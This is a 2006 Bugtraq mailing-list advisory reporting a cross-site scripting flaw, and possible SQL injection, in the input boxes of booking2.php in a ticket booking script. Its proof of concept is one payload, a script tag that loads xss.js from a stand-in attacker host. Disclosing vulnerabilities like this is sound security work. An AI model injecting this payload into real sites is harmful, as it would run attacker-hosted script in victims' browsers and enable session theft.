Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

mole.com.ua Ticket Booking Script - XSS

From: luny () youfucktard com
Date: 9 Jun 2006 05:04:04 -0000
Ticket Booking Script

Homepage:
http://www.mole.com.ua

Effected files:
input boxes on booking2.php

XSS Vulnerabilities:

The input boxes on booking2.php do not sanatize userinput before geenrating it and then submitting it to a MySQL db. 
This can causes XSS examples as well as possible SQL injections.

For PoC just put <SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT> in any of the input boxes
Previous By Date Next
Previous By Thread Next

Current thread: